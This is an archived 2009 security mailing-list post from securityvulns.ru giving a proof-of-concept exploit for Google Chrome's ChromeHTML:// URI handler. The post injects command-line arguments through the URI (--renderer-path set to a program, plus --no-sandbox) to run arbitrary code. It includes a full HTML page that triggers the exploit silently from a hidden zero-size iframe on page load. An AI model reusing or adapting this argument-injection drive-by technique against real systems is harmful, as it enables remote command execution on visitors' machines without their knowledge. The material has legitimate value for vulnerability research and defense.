Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Google Chrome code execution

From:Janek Vind <come2waraxe_(at)_yahoo.com>
Date:31.01.2009
Subject:Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

<html><head><title>Chrome URI Handler Remote Command Execution PoC</title></head>
<body>
<h3>This is a test</h3>
<iframe src='chromehtml:"%20--renderer-path="calc"%20--no-
sandbox' width=0 height=0></iframe>
</body></html>

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server